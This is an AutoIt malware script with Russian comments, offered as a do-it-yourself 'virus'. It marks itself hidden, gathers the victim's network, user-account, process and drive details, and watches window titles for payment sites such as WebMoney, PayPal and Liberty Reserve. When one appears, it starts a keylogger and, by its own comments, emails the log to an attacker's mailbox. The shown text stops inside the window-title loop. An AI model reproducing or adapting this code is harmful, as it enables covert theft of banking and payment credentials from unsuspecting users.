;По сути все скрипты написаны предельно просто и будут просто замечательным (на мой взгляд) вирусом который можно сделать самому не зная ни какого языка программирования.
;                                                                          [email protected] Specially for TheHackWorld.iN ©
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

#NoTrayIcon
#include <file.au3>
#include <inet.au3>
#include <process.au3>
#Include<Array.au3>
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; не много распишу алгоритм ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;Данный скрипт собирает не много информации о тачке на которой он выполняется и вписывает это всё так сказать во временный лог файл,далее начинает отлавливать нужные слова в заголовках актичных окон
;до того момента пока какое либо из искомых слов не появится в поле зрения (так сказать),как только слово будет обнаружено запускает кейлогер и ждёт указнное количество времени,по истечению которого тормазит кейлогер
; читает файл лога и отправляет его в теле письма на указанный почтовый ящик,далее весь алгоритм повторяется,думаю более менее разъяснил тем самым обстанову алгоритмом данного скрипта,если всё же не очень понятно
;далее не много раскоментированы некоторые участки кода,изучив коменты и команды можно пополнить базу искомых слов.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Вносим данные от почтового(ых) ящика(ов) куда будут идти отчёта кейлогера ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
filesetattrib ( @scriptname, "+s+h") ; ставим на себя атрибуты
$smtpserver = "smtp.server.com"              ; адрес smtp сервера
$fromname = @ComputerName                    ; в поле от кого будет указано имя тачки на которой был запущен вирус
$fromaddress = "[email protected]" ; адрес отправителя
$toaddress = "[email protected]"  ; адрес получателя,можно смело указывать другой почтовый ящик.
$subject = "Отчёт Keyloger Site detektors 1.0 beta от "&@UserName&"."      ; тема письма,@UserName будет указывать имя пользователя под которым был запущен вирус
$attachfiles = ''
$ccaddress = ""
$bccaddress = ""
$importance = "normal"          ; приоритет отсылки письма,другие варианты: "high", "normal", "low"
$username = "[email protected]" ; имя отправителя
$password = "Password"  ; пас отпрвителя
$ipport = 587          ; порт можно 25,ну и так норм отправляет,для почтовой службы gmail необходимо сменить порт на 465 ($ipport=465)
$ssl = 0
$log = @WindowsDir & "\swnc\"&@UserName&"-log.sft"; это своего рода временный файл,который будет создаваться в отдельной папке,так сказать от греха подальше))
$lang = @OSLang ; команда выводящия свое образный код языка системы

Global $alang_Codes[127] ; массив для замены кода на нормальный буквенный понятный вид языка системы
$alang_Codes[0]=126 ;указываем количество ячеек
$alang_Codes[1]="Afrikaans" ;и перечисляем их
$alang_Codes[2]="Albanian"
$alang_Codes[3]="Arabic_Saudi_Arabia"
$alang_Codes[4]="Arabic_Iraq"
$alang_Codes[5]="Arabic_Egypt"
$alang_Codes[6]="Arabic_Libya"
$alang_Codes[7]="Arabic_Algeria"
$alang_Codes[8]="Arabic_Morocco"
$alang_Codes[9]="Arabic_Tunisia"
$alang_Codes[10]="Arabic_Oman"
$alang_Codes[11]="Arabic_Yemen"
$alang_Codes[12]="Arabic_Syria"
$alang_Codes[13]="Arabic_Jordan"
$alang_Codes[14]="Arabic_Lebanon"
$alang_Codes[15]="Arabic_Kuwait"
$alang_Codes[16]="Arabic_UAE"
$alang_Codes[17]="Arabic_Bahrain"
$alang_Codes[18]="Arabic_Qatar"
$alang_Codes[19]="Armenian"
$alang_Codes[20]="Azeri_Latin"
$alang_Codes[21]="Azeri_Cyrillic"
$alang_Codes[22]="Basque"
$alang_Codes[23]="Belarusian"
$alang_Codes[24]="Bulgarian"
$alang_Codes[25]="Catalan"
$alang_Codes[26]="Chinese_Taiwan"
$alang_Codes[27]="Chinese_PRC"
$alang_Codes[28]="Chinese_Hong_Kong"
$alang_Codes[29]="Chinese_Singapore"
$alang_Codes[30]="Chinese_Macau"
$alang_Codes[31]="Croatian"
$alang_Codes[32]="Czech"
$alang_Codes[33]="Danish"
$alang_Codes[34]="Dutch_Standard"
$alang_Codes[35]="Dutch_Belgian"
$alang_Codes[36]="English_United_States"
$alang_Codes[37]="English_United_Kingdom"
$alang_Codes[38]="English_Australian"
$alang_Codes[39]="English_Canadian"
$alang_Codes[40]="English_New_Zealand"
$alang_Codes[41]="English_Irish"
$alang_Codes[42]="English_South_Africa"
$alang_Codes[43]="English_Jamaica"
$alang_Codes[44]="English_Caribbean"
$alang_Codes[45]="English_Belize"
$alang_Codes[46]="English_Trinidad"
$alang_Codes[47]="English_Zimbabwe"
$alang_Codes[48]="English_Philippines"
$alang_Codes[49]="Estonian"
$alang_Codes[50]="Faeroese"
$alang_Codes[51]="Farsi"
$alang_Codes[52]="Finnish"
$alang_Codes[53]="French_Standard"
$alang_Codes[54]="French_Belgian"
$alang_Codes[55]="French_Canadian"
$alang_Codes[56]="French_Swiss"
$alang_Codes[57]="French_Luxembourg"
$alang_Codes[58]="French_Monaco"
$alang_Codes[59]="Georgian"
$alang_Codes[60]="German_Standard"
$alang_Codes[61]="German_Swiss"
$alang_Codes[62]="German_Austrian"
$alang_Codes[63]="German_Luxembourg"
$alang_Codes[64]="German_Liechtenstei"
$alang_Codes[65]="Greek"
$alang_Codes[66]="Hebrew"
$alang_Codes[67]="Hindi"
$alang_Codes[68]="Hungarian"
$alang_Codes[69]="Icelandic"
$alang_Codes[70]="Indonesian"
$alang_Codes[71]="Italian_Standard"
$alang_Codes[72]="Italian_Swiss"
$alang_Codes[73]="Japanese"
$alang_Codes[74]="Kazakh"
$alang_Codes[75]="Konkani"
$alang_Codes[76]="Korean"
$alang_Codes[77]="Latvian"
$alang_Codes[78]="Lithuanian"
$alang_Codes[79]="Macedonian"
$alang_Codes[80]="Malay_Malaysia"
$alang_Codes[81]="Malay_Brunei_Darussalam"
$alang_Codes[82]="Marathi"
$alang_Codes[83]="Norwegian_Bokmal"
$alang_Codes[84]="Norwegian_Nynorsk"
$alang_Codes[85]="Polish"
$alang_Codes[86]="Portuguese_Brazilian"
$alang_Codes[87]="Portuguese_Standard"
$alang_Codes[88]="Romanian"
$alang_Codes[89]="Russian"
$alang_Codes[90]="Sanskrit"
$alang_Codes[91]="Serbian_Latin"
$alang_Codes[92]="Serbian_Cyrillic"
$alang_Codes[93]="Slovak"
$alang_Codes[94]="Slovenian"
$alang_Codes[95]="Spanish_Traditional_Sort"
$alang_Codes[96]="Spanish_Mexican"
$alang_Codes[97]="Spanish_Modern_Sort"
$alang_Codes[98]="Spanish_Guatemala"
$alang_Codes[99]="Spanish_Costa_Rica"
$alang_Codes[100]="Spanish_Panama"
$alang_Codes[101]="Spanish_Dominican_Republic"
$alang_Codes[102]="Spanish_Venezuela"
$alang_Codes[103]="Spanish_Colombia"
$alang_Codes[104]="Spanish_Peru"
$alang_Codes[105]="Spanish_Argentina"
$alang_Codes[106]="Spanish_Ecuador"
$alang_Codes[107]="Spanish_Chile"
$alang_Codes[108]="Spanish_Uruguay"
$alang_Codes[109]="Spanish_Paraguay"
$alang_Codes[110]="Spanish_Bolivia"
$alang_Codes[111]="Spanish_El_Salvador"
$alang_Codes[112]="Spanish_Honduras"
$alang_Codes[113]="Spanish_Nicaragua"
$alang_Codes[114]="Spanish_Puerto_Rico"
$alang_Codes[115]="Swahili"
$alang_Codes[116]="Swedish"
$alang_Codes[117]="Swedish_Finland"
$alang_Codes[118]="Tamil"
$alang_Codes[119]="Tatar"
$alang_Codes[120]="Thai"
$alang_Codes[121]="Turkish"
$alang_Codes[122]="Ukrainian"
$alang_Codes[123]="Urdu"
$alang_Codes[124]="Uzbek_Latin"
$alang_Codes[125]="Uzbek_Cyrillic"
$alang_Codes[126]="Vietnamese"

global $aCapture_Codes[127] ;  в этом массиве находятся коды которые выводит команда @OSLang,а в пред идущем массиве находятся названия языков\стран уже в буквенном виде,так сказать расшифрованные,точно в таком же порядке.
$aCapture_Codes[0]='126'
$aCapture_Codes[1]='0436'
$aCapture_Codes[2]='041c'
$aCapture_Codes[3]='0401'
$aCapture_Codes[4]='0801'
$aCapture_Codes[5]='0c01'
$aCapture_Codes[6]='1001'
$aCapture_Codes[7]='1401'
$aCapture_Codes[8]='1801'
$aCapture_Codes[9]='1c01'
$aCapture_Codes[10]='2001'
$aCapture_Codes[11]='2401'
$aCapture_Codes[12]='2801'
$aCapture_Codes[13]='2c01'
$aCapture_Codes[14]='3001'
$aCapture_Codes[15]='3401'
$aCapture_Codes[16]='3801'
$aCapture_Codes[17]='3c01'
$aCapture_Codes[18]='4001'
$aCapture_Codes[19]='042b'
$aCapture_Codes[20]='042c'
$aCapture_Codes[21]='082c'
$aCapture_Codes[22]='042d'
$aCapture_Codes[23]='0423'
$aCapture_Codes[24]='0402'
$aCapture_Codes[25]='0403'
$aCapture_Codes[26]='0404'
$aCapture_Codes[27]='0804'
$aCapture_Codes[28]='0c04'
$aCapture_Codes[29]='1004'
$aCapture_Codes[30]='1404'
$aCapture_Codes[31]='041a'
$aCapture_Codes[32]='0405'
$aCapture_Codes[33]='0406'
$aCapture_Codes[34]='0413'
$aCapture_Codes[35]='0813'
$aCapture_Codes[36]='0409'
$aCapture_Codes[37]='0809'
$aCapture_Codes[38]='0c09'
$aCapture_Codes[39]='1009'
$aCapture_Codes[40]='1409'
$aCapture_Codes[41]='1809'
$aCapture_Codes[42]='1c09'
$aCapture_Codes[43]='2009'
$aCapture_Codes[44]='2409'
$aCapture_Codes[45]='2809'
$aCapture_Codes[46]='2c09'
$aCapture_Codes[47]='3009'
$aCapture_Codes[48]='3409'
$aCapture_Codes[49]='0425'
$aCapture_Codes[50]='0438'
$aCapture_Codes[51]='0429'
$aCapture_Codes[52]='040b'
$aCapture_Codes[53]='040c'
$aCapture_Codes[54]='080c'
$aCapture_Codes[55]='0c0c'
$aCapture_Codes[56]='100c'
$aCapture_Codes[57]='140c'
$aCapture_Codes[58]='180c'
$aCapture_Codes[59]='0437'
$aCapture_Codes[60]='0407'
$aCapture_Codes[61]='0807'
$aCapture_Codes[62]='0c07'
$aCapture_Codes[63]='1007'
$aCapture_Codes[64]='1407'
$aCapture_Codes[65]='408'
$aCapture_Codes[66]='040d'
$aCapture_Codes[67]='0439'
$aCapture_Codes[68]='040e'
$aCapture_Codes[69]='040f'
$aCapture_Codes[70]='0421'
$aCapture_Codes[71]='0410'
$aCapture_Codes[72]='0810'
$aCapture_Codes[73]='0411'
$aCapture_Codes[74]='043f'
$aCapture_Codes[75]='0457'
$aCapture_Codes[76]='0412'
$aCapture_Codes[77]='0426'
$aCapture_Codes[78]='0427'
$aCapture_Codes[79]='042f'
$aCapture_Codes[80]='043e'
$aCapture_Codes[81]='083e'
$aCapture_Codes[82]='044e'
$aCapture_Codes[83]='0414'
$aCapture_Codes[84]='0814'
$aCapture_Codes[85]='0415'
$aCapture_Codes[86]='0416'
$aCapture_Codes[87]='0816'
$aCapture_Codes[88]='0418'
$aCapture_Codes[89]='0419'
$aCapture_Codes[90]='044f'
$aCapture_Codes[91]='081a'
$aCapture_Codes[92]='0c1a'
$aCapture_Codes[93]='041b'
$aCapture_Codes[94]='0424'
$aCapture_Codes[95]='040a'
$aCapture_Codes[96]='080a'
$aCapture_Codes[97]='0c0a'
$aCapture_Codes[98]='100a'
$aCapture_Codes[99]='140a'
$aCapture_Codes[100]='180a'
$aCapture_Codes[101]='1c0a'
$aCapture_Codes[102]='200a'
$aCapture_Codes[103]='240a'
$aCapture_Codes[104]='280a'
$aCapture_Codes[105]='2c0a'
$aCapture_Codes[106]='300a'
$aCapture_Codes[107]='340a'
$aCapture_Codes[108]='380a'
$aCapture_Codes[109]='3c0a'
$aCapture_Codes[110]='400a'
$aCapture_Codes[111]='440a'
$aCapture_Codes[112]='480a'
$aCapture_Codes[113]='4c0a'
$aCapture_Codes[114]='500a'
$aCapture_Codes[115]='0441'
$aCapture_Codes[116]='041d'
$aCapture_Codes[117]='081d'
$aCapture_Codes[118]='0449'
$aCapture_Codes[119]='0444'
$aCapture_Codes[120]='041e'
$aCapture_Codes[121]='041f'
$aCapture_Codes[122]='0422'
$aCapture_Codes[123]='0420'
$aCapture_Codes[124]='0443'
$aCapture_Codes[125]='0843'
$aCapture_Codes[126]='042a'

$Pos = _ArraySearch ($aCapture_Codes, $lang) ;ищем по масиву с кодами определённый командой @OSLang код и записываем его позицую в код,после тупа подставим позицию во второй массив.

Dim $strComputer = ".", $string, $strIPAddress, $IPAddress, $IPSubnet, $strIPSubnet, $DefaultIPGateway, $strDefaultIPGateway ;используем Win32_NetworkAdapterConfiguration для вытягивание некоротой инфы из компа

$objWMIService = ObjGet("winmgmts:{impersonationLevel=impersonate}!\\" & $strComputer & "\root\cimv2")
$colItems = $objWMIService.ExecQuery("Select * from Win32_NetworkAdapterConfiguration")

For $objItem In $colItems
    $string &= @LF
    $string &= "<BR><font color=teal style=font-size:17px>Caption:</font>  " & $objItem.Caption & @LF
    $string &= "<BR><font color=teal style=font-size:17px>Description:</font>  " & $objItem.Description & @LF

    If UBound($objItem.IPAddress) > 0 Then
        For $IPAddress In $objItem.IPAddress
            $strIPAddress &= $IPAddress & "; "
        Next
        $string &= "<BR><font color=teal style=font-size:17px>IPAddress:</font>  " & StringTrimRight($strIPAddress, 2) & @LF
    EndIf

    If UBound($objItem.IPSubnet) > 0 Then
        For $IPSubnet In $objItem.IPSubnet
            $strIPSubnet &= $IPSubnet & "; "
        Next
        $string &= "<BR><font color=teal style=font-size:17px>IPSubnet:</font>  " & StringTrimRight($strIPSubnet, 2) & @LF
    EndIf

    If UBound($objItem.DefaultIPGateway) > 0 Then
        For $DefaultIPGateway In $objItem.DefaultIPGateway
            $strDefaultIPGateway &= $DefaultIPGateway & "; "
        Next
        $string &= "<BR><font color=teal style=font-size:17px>DefaultIPGateway:</font>  " & StringTrimRight($strDefaultIPGateway, 2) & @LF
    EndIf

    $string &= "<BR><font color=teal style=font-size:17px>DNSDomain:</font>  " & $objItem.DNSDomain & @LF
    $string &= "<BR><font color=teal style=font-size:17px>DNSHostName:</font>  " & $objItem.DNSHostName & @LF
    $string &= "<BR><font color=teal style=font-size:17px>MACAddress:</font>  " & $objItem.MACAddress & @LF
Next

Dim $stComputer = ".", $stri ; практически таким же макаром вытяним локальную информацию о тачке на которой находится наш кейлогер

$objWMIService = ObjGet("winmgmts:{impersonationLevel=impersonate}!\\" & $stComputer & "\root\cimv2")
$colItems = $objWMIService.ExecQuery("Select * from Win32_UserAccount")

For $objItem In $colItems
    $stri &= "<BR><font color=teal style=font-size:17px>Caption -</font> " & $objItem.Caption & @LF
    $stri &= "<BR><font color=teal style=font-size:17px>Account Type -</font> " & $objItem.AccountType & @LF
    $stri &= "<BR><font color=teal style=font-size:17px>Disabled - </font>" & $objItem.Disabled & @LF
    $stri &= "<BR><font color=teal style=font-size:17px>Domain - </font>" & $objItem.Domain & @LF
    $stri &= "<BR><font color=teal style=font-size:17px>Full Name - </font>" & $objItem.FullName & @LF
    $stri &= "<BR><font color=teal style=font-size:17px>Install Date -</font> " & $objItem.InstallDate & @LF
    $stri &= "<BR><font color=teal style=font-size:17px>Local Account - </font>" & $objItem.LocalAccount & @LF
    $stri &= "<BR><font color=teal style=font-size:17px>Lockout -</font> " & $objItem.Lockout & @LF
    $stri &= "<BR><font color=teal style=font-size:17px>Name -</font> " & $objItem.Name & @LF
    $stri &= "<BR><font color=teal style=font-size:17px>Password Changeable - </font>" & $objItem.PasswordChangeable & @LF
    $stri &= "<BR><font color=teal style=font-size:17px>Password Expires -</font> " & $objItem.PasswordExpires & @LF
    $stri &= "<BR><font color=teal style=font-size:17px>Password Required -</font> " & $objItem.PasswordRequired & @LF
    $stri &= "<BR><font color=teal style=font-size:17px>SID -</font> " & $objItem.SID & @LF
    $stri &= "<BR><font color=teal style=font-size:17px>SID Type -</font> " & $objItem.SIDType & @LF
    $stri &= "<BR><font color=teal style=font-size:17px>Status -</font> " & $objItem.Status
Next

FileOpen($log, 2);открываем файл лога для записи и начинаем писать
Sleep(100)
FileWrite($log, '<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251">') ; ну эт тип для того чтобы в письме не отображались краказябры,а все приходило в понятном для человеческого глаза виде,тупа HTML теги и команды,их расписывать не буду
; ибо это уже перебор.
FileWrite($log, '<body background="http://i5.pixs.ru/storage/1/4/1/matricabel_9581274_3013141.gif" bgcolor=#000000 text=green>')
FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=#ff0000 style=font-size:28px> Keyloger Site detektors 1.0 beta &reg; </font><font color=crimson>]#]</font></center></b><br><br><br>")
  FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:19px>Данные о тачке на котрой запущен Keylogger Widows detektors 1.0 beta :</font> <font color=crimson>]#]</font> </center></b><br>")
  FileWrite($log, "<b><font color=saddlebrown style=font-size:19px>Внутрений IP Адрес:</b> </font><font color=teal style=font-size:17px>"& @IPAddress1&" </font><br>") ; пишем внутрений ip адрес тачки, может вернуть 127.0.0.1
  FileWrite($log, "<b><font color=saddlebrown style=font-size:19px>Возвращает IP адрес 2 сетевого адаптера(при отсутствие вернёт 0.0.0.0):</font> </b><font color=teal style=font-size:17px>"& @IPAddress2&" </font><br>"); ну аналогично только возращает IP второго сетевого
  FileWrite($log, "<b><font color=saddlebrown style=font-size:19px>Возвращает IP адрес 3 сетевого адаптера(при отсутствие вернёт 0.0.0.0):</font> </b><font color=teal style=font-size:17px>"& @IPAddress3&" </font><br>"); и так далее до 4 сетевых адаптеров
  FileWrite($log, "<b><font color=saddlebrown style=font-size:19px>Возвращает IP адрес 4 сетевого адаптера(при отсутствие вернёт 0.0.0.0):</font> </b><font color=teal style=font-size:17px>"& @IPAddress4&" </font><br>");
  FileWrite($log, "<b><font color=saddlebrown style=font-size:19px>Имя Пользователя:</b> </font><font color=teal style=font-size:17px>" & @UserName &" </font><br>") ; вписываем имя текущего пользователя под которым запущен кейлогер
  FileWrite($log, "<b><font color=saddlebrown style=font-size:19px>Сетевое имя компьютера:</font> </b><font color=teal style=font-size:17px>"& @ComputerName&" </font><br>") ; имя компьютера
FileWrite($log, "<b><font color=saddlebrown style=font-size:19px>Тип оперативной системы:</font> </b><font color=teal style=font-size:17px>"& @OSType &" </font><br>") ; тип установленной ОС под которой запущен кейлогер
FileWrite($log, "<b><font color=saddlebrown style=font-size:19px>Версия оперативной системы:</font> </b><font color=teal style=font-size:17px>"& @OSVersion &" </font><br>") ; версия ОС
FileWrite($log, "<b><font color=saddlebrown style=font-size:19px>Язык оперативной системы:</font> </b><font color=teal style=font-size:17px>"& $alang_Codes[$Pos] &" </font><br>") ; вписываем язык системы по умолчанию
FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:19px> Информация полученная при помощи Win32_NetworkAdapterConfiguration:</font> <font color=crimson>]#]</font> </center></b><br>")
FileWrite($log, $string) ; пишем инфу вытянутую при помощи Win32_NetworkAdapterConfiguration
  FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:19px> Локальная информация ОС:</font> <font color=crimson>]#]</font> </center></b><br>")
FileWrite($log, $stri) ; пишем локальную информацию
FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:19px> Список запущенных процессов:</font> <font color=crimson>]#]</font> </center></b><br>")
$list = ProcessList() ; далее определяем список запущенных в данный момент процессов
for $i = 1 to $list[0][0]
  FileWrite($log," <font color=teal style=font-size:17px> Name process: </font>"& $list[$i][0] & "<br>") ; и пишем его,каждый процесс с новой строки
next
FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:19px> Количество и имена дисков на тачке:</font> <font color=crimson>]#]</font> </center></b><br>")

$var = DriveGetDrive( "all" ) ; определяем общее количество дисков
If NOT @error Then
    FileWrite($log,"<font color=teal style=font-size:17px>Всего " & $var[0] & " диск(а\ов)</font><br>") ; пишем коичество всех дисков
    For $i = 1 to $var[0]
        FileWrite($log,"<font color=teal style=font-size:17px> " & $var[$i]& ",</font>") ; выводим каждый диск через запятую по имени
    Next
EndIf

$var2 = DriveGetDrive( "CDROM" ) ; определяем какие из них CD rom'ы
If NOT @error Then
    FileWrite($log,"<br><font color=teal style=font-size:17px>Из них " & $var2[0] & " CDROM(а) </font><br>") ; пишем количество CD rom'ов и есть ли они вообще
    For $i = 1 to $var2[0]
        FileWrite($log,"<font color=teal style=font-size:17px> " & $var2[$i]& ",</font>") ; перечисляем их по именам
    Next
EndIf

$var3 = DriveGetDrive( "REMOVABLE" ) ; определяем есть ли переносные диски
If NOT @error Then
    FileWrite($log,"<br><font color=teal style=font-size:17px> Ещё " & $var3[0] & " предположительно являются Flash либо просто переносные </font><br>"); пишем сколько их если они есть вообще
    For $i = 1 to $var3[0]
        FileWrite($log,"<font color=teal style=font-size:17px> " & $var3[$i]& ",</font>") ; перечисляем их по именам
    Next
EndIf

$var4 = DriveGetDrive( "FIXED" ) ; определяем какие из них фиксированные
If NOT @error Then
    FileWrite($log,"<br><font color=teal style=font-size:17px> Ещё " & $var4[0] & " фиксированные(й)</font><br>") ; пишем количества
    For $i = 1 to $var4[0]
        FileWrite($log,"<font color=teal style=font-size:17px> " & $var4[$i]& ",</font>") ; перечисляем их по именам
    Next
EndIf

$var5 = DriveGetDrive( "NETWORK" ) ; определяем есть ли сетевые диски
If NOT @error Then
    FileWrite($log,"<br><font color=teal style=font-size:17px> Ещё " & $var5[0] & " сетевой(ых)</font><br>") ; если есть пишем количество
    For $i = 1 to $var5[0]
        FileWrite($log,"<font color=teal style=font-size:17px> " & $var5[$i]& ",</font>") ; перечисляем их по именам
    Next
EndIf

$var6 = DriveGetDrive( "RAMDISK" ) ; определяем где RAm диски
If NOT @error Then
    FileWrite($log,"<br><font color=teal style=font-size:17px> Ещё " & $var6[0] & " RAMDISK(а)</font><br>") ; выводим их количество
    For $i = 1 to $var6[0]
        FileWrite($log,"<font color=teal style=font-size:17px> " & $var6[$i]& ",</font>") ; перечисляем их по именам
    Next
EndIf

  $var6 = DriveGetDrive( "UNKNOWN" ) ; определяем есть ли такие которые не поддаются определению
If NOT @error Then
    FileWrite($log,"<br><font color=teal style=font-size:17px> остальные " & $var6[0] & " не определен(ы)</font><br>"); если есть выводим количество
    For $i = 1 to $var6[0]
        FileWrite($log,"<font color=teal style=font-size:17px> " & $var6[$i]& ",</font>") ; перечисляемих по именам
    Next
EndIf
FileWrite($log,"<br><font color=teal style=font-size:17px>Система стоит на диске: " & @HomeDrive & " ,путь до системной папки: "& @SystemDir &  "<br></font><br>") ;@HomeDrive аналогичен команде CMD %HomeDrive%,то есть тупа определяем на каком диске стоит система,ну @SystemDir думаю понятно,ловим путь до папки system32.
  FileWrite($log, "<br><br><b><center><font color=teal style=font-size:16px> Если не понятки,то есть если нажата не буква и не цифра будет показан номер клавиши,в виде: </font><font color=#ff0000 style=font-size:15px>#ХЗ №(номер клавиши)#</font></center></b><br>")

While 1
    WinWaitActive("", "") ; ну и основа так сказать)),вообщем начинаем процесс отлова заголоков активных окон
    If WinWaitActive("WebMoney","",1) Then ; указываем какое слово будем искать в заголовке активного окна и в последствие среагируем.
        Sleep(100)
        FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:19px> Старт записи лога в файл(время старта,найденное слово в заголовке,предположительный адрес сайта):</font> <font color=crimson>]#]</font> </center></b><br>") ;если поймали нужное нам слово,то
FileWrite($log, "<br><BR>" & "<b><font color=teal style=font-size:15px>Время:</font> <font color=#00ffff style=font-size:14px>[" & @YEAR & "." & @MON & "." & @MDAY & " " & @HOUR & ":" & @MIN & ":" & @SEC & ']</font><font color=teal style=font-size:15px> Найдено в заголовке :</font> <font color=#00ffff style=font-size:14px>  WebMoney </font><font color=teal style=font-size:15px>Предположительный адрес сайта:</font> <font color=#00ffff style=font-size:14px> <a href=https://webmoney.ru target=blanck>https://webmoney.ru</a></font></b><br>"') ; пишем время,какое слово было обнаруженно и предположительный адрес сайта.
FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:17px> Log : </font><font color=crimson>]#]</font> </center></b><br>")
FileClose($log) ; закрываем файл лога
ShellExecute( @WindowsDir & "\GTS\wincl.exe") ; запускаем наш кейлогер
sleep(100)
_quit(); запускаем функцию,которая в свою очередь несёт не малую роль в алгоритме всего скрипта,а именно: ждёт указнное количество времени,останавливает кейлогер,отправляет письмо в теле которого будет весь записанный лог вместе с полученной информацией
    ElseIf WinWaitActive("Яндекс","",1) Then ; ну а дальше аналогия предидущему,только искомые слова другие,таким же образом можно добавить ещё практически сколько угодно искомых слов,главное не переборщить,иначе скрипт будет тупа подтупливать
        Sleep(100)
FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:19px> Старт записи лога в файл(время старта,найденное слово в заголовке,предположительный адрес сайта):</font> <font color=crimson>]#]</font> </center></b><br>")
FileWrite($log, "<br><BR>" & "<b><font color=teal style=font-size:15px>Время:</font> <font color=#00ffff style=font-size:14px>[" & @YEAR & "." & @MON & "." & @MDAY & " " & @HOUR & ":" & @MIN & ":" & @SEC & ']</font><font color=teal style=font-size:15px> Найдено в заголовке :</font> <font color=#00ffff style=font-size:14px>  Яндекс </font><font color=teal style=font-size:15px>Предположительный адрес сайта:</font> <font color=#00ffff style=font-size:14px> <a href=http://yandex.ru target=blanck>http://yandex.ru</a></font></b><br>"')
FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:17px> Log : </font><font color=crimson>]#]</font> </center></b><br>")
FileClose($log)
ShellExecute( @WindowsDir & "\GTS\wincl.exe")
sleep(100)
_quit()
  ElseIf WinWaitActive("PayPal","",1) Then
        Sleep(100)
FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:19px> Старт записи лога в файл(время старта,найденное слово в заголовке,предположительный адрес сайта):</font> <font color=crimson>]#]</font> </center></b><br>")
FileWrite($log, "<br><BR>" & "<b><font color=teal style=font-size:15px>Время:</font> <font color=#00ffff style=font-size:14px>[" & @YEAR & "." & @MON & "." & @MDAY & " " & @HOUR & ":" & @MIN & ":" & @SEC & ']</font><font color=teal style=font-size:15px> Найдено в заголовке :</font> <font color=#00ffff style=font-size:14px>  PayPal </font><font color=teal style=font-size:15px>Предположительный адрес сайта:</font> <font color=#00ffff style=font-size:14px> <a href=https://www.paypal.com/ru target=blanck>https://www.paypal.com/</a></font></b><br>"')
FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:17px> Log : </font><font color=crimson>]#]</font> </center></b><br>")
FileClose($log)
ShellExecute( @WindowsDir & "\GTS\wincl.exe")
sleep(100)
_quit()
  ElseIf WinWaitActive("Liberty Reserve","",1) Then
        Sleep(100)
FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:19px> Старт записи лога в файл(время старта,найденное слово в заголовке,предположительный адрес сайта):</font> <font color=crimson>]#]</font> </center></b><br>")
FileWrite($log, "<br><BR>" & "<b><font color=teal style=font-size:15px>Время:</font> <font color=#00ffff style=font-size:14px>[" & @YEAR & "." & @MON & "." & @MDAY & " " & @HOUR & ":" & @MIN & ":" & @SEC & ']</font><font color=teal style=font-size:15px> Найдено в заголовке :</font> <font color=#00ffff style=font-size:14px>  Liberty Reserve </font><font color=teal style=font-size:15px>Предположительный адрес сайта:</font> <font color=#00ffff style=font-size:14px> <a href=http://www.libertyreserve.su/ target=blanck>http://www.libertyreserve.su/</a></font></b><br>"')
FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:17px> Log : </font><font color=crimson>]#]</font> </center></b><br>")
FileClose($log)
ShellExecute( @WindowsDir & "\GTS\wincl.exe")
sleep(100)
_quit()
  ElseIf WinWaitActive("AlertPay.com","",1) Then
        Sleep(100)
FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:19px> Старт записи лога в файл(время старта,найденное слово в заголовке,предположительный адрес сайта):</font> <font color=crimson>]#]</font> </center></b><br>")
FileWrite($log, "<br><BR>" & "<b><font color=teal style=font-size:15px>Время:</font> <font color=#00ffff style=font-size:14px>[" & @YEAR & "." & @MON & "." & @MDAY & " " & @HOUR & ":" & @MIN & ":" & @SEC & ']</font><font color=teal style=font-size:15px> Найдено в заголовке :</font> <font color=#00ffff style=font-size:14px>  AlertPay.com </font><font color=teal style=font-size:15px>Предположительный адрес сайта:</font> <font color=#00ffff style=font-size:14px> <a href=https://www.alertpay.com/en/Default.aspx target=blanck>https://www.alertpay.com/en/Default.aspx</a></font></b><br>"')
FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:17px> Log : </font><font color=crimson>]#]</font> </center></b><br>")
FileClose($log)
ShellExecute( @WindowsDir & "\GTS\wincl.exe")
sleep(100)
_quit()
  ElseIf WinWaitActive("Платежная система","",1) Then
        Sleep(100)
FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:19px> Старт записи лога в файл(время старта,найденное слово в заголовке,предположительный адрес сайта):</font> <font color=crimson>]#]</font> </center></b><br>")
FileWrite($log, "<br><BR>" & "<b><font color=teal style=font-size:15px>Время:</font> <font color=#00ffff style=font-size:14px>[" & @YEAR & "." & @MON & "." & @MDAY & " " & @HOUR & ":" & @MIN & ":" & @SEC & ']</font><font color=teal style=font-size:15px> Найдено в заголовке :</font> <font color=#00ffff style=font-size:14px>  Платежная система </font><font color=teal style=font-size:15px>Предположительный адрес сайта:</font> <font color=#00ffff style=font-size:14px> <a href=http://www.z-payment.ru/ target=blanck>http://www.z-payment.ru/</a></font></b><br>"')
